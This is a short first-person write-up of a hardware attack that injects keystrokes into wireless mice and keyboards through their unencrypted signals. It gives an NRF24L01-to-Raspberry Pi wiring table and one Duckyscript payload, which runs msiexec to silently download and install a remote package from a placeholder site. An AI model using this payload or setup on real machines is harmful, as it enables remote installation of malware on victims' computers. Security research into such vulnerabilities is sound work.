I exploited a widespread vulnerability found in the chips of wireless HID devices. This allows an attacker to remotely inject keystrokes into a target machine by hijacking unencrypted signals from wireless mice and keyboards, and sending out forged commands.
I used: NRF24L Chip, Raspberry Pi Zero W, 3.3V Voltage Regulator, an External Antenna, 3.7V power source, 32GB MicroSD card, PowerShell, and Duckyscript.
Instead of using an expensive Crazyradio PA adapter, I directly soldered an NRF24L module to a 3.3V voltage regulator and wired it to my Raspberry Pi Zero W via the GPIO pins listed below:
NRF24L01 adapter board | Raspberry Pi Zero W
VCC (5V) | Pin 2 (5V)
GND | Pin 6 (GND)
CE | Pin 22 (GPIO25)
CSN | Pin 24 (GPIO8, SPI_CE0)
SCK | Pin 23 (GPIO11, SPI_CLK)
MOSI | Pin 19 (GPIO10, SPI_MOSI)
MISO | Pin 21 (GPIO9, SPI_MISO)
This allowed me to still utilise the vulnerability found on the NRF24L01 chipset, but without having to pay the extra for ready to use adapter from Crazy-Radio.
Here is an example of a payload an attacker could use to execute malware.
GUI r
DELAY 300
STRING msiexec /i http://yoursite.com/file.msi /quiet
DELAY 300
ENTER
This isn't the only type of attack that could be done with this setup. Most RubberDucky payloads will also work with this attack method Because both attacks act as HID devices and run similar commands.